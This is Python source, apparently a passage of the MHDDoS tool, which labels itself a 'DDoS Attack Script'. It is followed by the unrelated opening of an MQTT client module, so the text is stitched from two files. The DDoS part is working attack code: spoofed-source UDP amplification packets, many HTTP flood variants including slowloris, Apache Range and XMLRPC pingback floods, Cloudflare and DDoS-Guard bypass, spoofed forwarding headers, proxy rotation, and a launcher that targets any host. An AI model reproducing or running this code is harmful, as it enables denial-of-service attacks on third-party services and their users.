return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
thread_id: int,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._thread_id = thread_id
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: keep-alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.settimeout(.9)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(ProxyTools.Random.rand_int(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def KILLER(self) -> None:
while True:
Thread(target=self.GET, daemon=True).start()
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
ts = time()
for _ in range(self._rpc):
Tools.send(s, payload)
if time() > ts + 120: break
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
with suppress(Exception):
if self._proxies:
pro = randchoice(self._proxies)
with Tools.dgb_solver(self._target.human_repr(),randchoice(self._useragents),pro.asRequest()) as ss:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
with ss.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
Tools.safe_close(ss)
with Tools.dgb_solver(self._target.human_repr(),randchoice(self._useragents)) as ss:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
with ss.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(ss)
def DYN(self):
payload: Any = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: Any = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: Any = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
assert self._proxies, \
'This method requires proxies. ' \
'Without proxies you can use github.com/codesenberg/bombardier'
while True:
proxy = randchoice(self._proxies)
if proxy.type != ProxyType.SOCKS4:
break
res = run(
[
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--latencies',
'--timeout=30s',
f'--requests={self._rpc}',
f'--proxy={proxy}',
f'{self._target.human_repr()}',
],
stdout=PIPE,
)
if self._thread_id == 0:
print(proxy, res.stdout.decode(), sep='\n')
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "DGB":
self.SENT_FLOOD = self.DGB
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
if name == "KILLER": self.SENT_FLOOD = self.KILLER
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info(f"{bcolors.WARNING}Downloading Proxies from {bcolors.OKBLUE}%d{bcolors.WARNING} Providers{bcolors.RESET}" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
f"{bcolors.WARNING}Proxies from (URL: {bcolors.OKBLUE}%s{bcolors.WARNING}, Type: {bcolors.OKBLUE}%s{bcolors.WARNING}, Timeout: {bcolors.OKBLUE}%d{bcolors.WARNING}){bcolors.RESET}" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error(f'Download Proxy Error: {(e.__str__() or e.__repr__())}')
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = f"{gethostname()}@MHTools:~#"
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print(f"{cmd} command not found")
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sent %s\n"
"Bytes Recived %s\n"
"Packets Sent %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info(f"TCP: {(info['_tsdns._tcp.'])}\n")
logger.info(f"UDP: {(info['_ts3._udp.'])}\n")
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning(f"{bcolors.WARNING}The file doesn't exist, creating files and downloading proxies.{bcolors.RESET}")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{bcolors.OKBLUE}{len(Proxies):,}{bcolors.WARNING} Proxies are getting checked, this may take awhile{bcolors.RESET}!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"{bcolors.WARNING}Proxy Count: {bcolors.OKBLUE}{len(proxies):,}{bcolors.RESET}")
else:
logger.info(
f"{bcolors.WARNING}Empty Proxy File, running flood witout proxy{bcolors.RESET}")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
port= None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path.home() / "go/bin/bombardier"
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for thread_id in range(threads):
HttpFlood(thread_id, url, host, method, rpc, event,
uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
f"{bcolors.WARNING}Attack Started to{bcolors.OKBLUE} %s{bcolors.WARNING} with{bcolors.OKBLUE} %s{bcolors.WARNING} method for{bcolors.OKBLUE} %s{bcolors.WARNING} seconds, threads:{bcolors.OKBLUE} %d{bcolors.WARNING}!{bcolors.RESET}"
% (target or url.host, method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug(f'{bcolors.WARNING}Target:{bcolors.OKBLUE} %s,{bcolors.WARNING} Port:{bcolors.OKBLUE} %s,{bcolors.WARNING} Method:{bcolors.OKBLUE} %s{bcolors.WARNING} PPS:{bcolors.OKBLUE} %s,{bcolors.WARNING} BPS:{bcolors.OKBLUE} %s / %d%%{bcolors.RESET}' %
(target or url.host,
port or (url.port or 80),
method,
Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import errno
import platform
import random
import select
import socket
HAVE_SSL = True
try:
import ssl
cert_reqs = ssl.CERT_REQUIRED
tls_version = ssl.PROTOCOL_TLSv1
except:
HAVE_SSL = False
cert_reqs = None
tls_version = None
import struct
import sys
import threading
import time
HAVE_DNS = True
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
from libs.AWSIoTPythonSDK.core.protocol.connection.cores import ProgressiveBackOffCore
from libs.AWSIoTPythonSDK.core.protocol.connection.cores import SecuredWebSocketCore
from libs.AWSIoTPythonSDK.core.protocol.connection.alpn import SSLContextBuilder
VERSION_MAJOR=1
VERSION_MINOR=0
VERSION_REVISION=0
VERSION_NUMBER=(VERSION_MAJOR*1000000+VERSION_MINOR*1000+VERSION_REVISION)
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] < 3:
PROTOCOL_NAMEv31 = "MQIsdp"
PROTOCOL_NAMEv311 = "MQTT"
else:
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
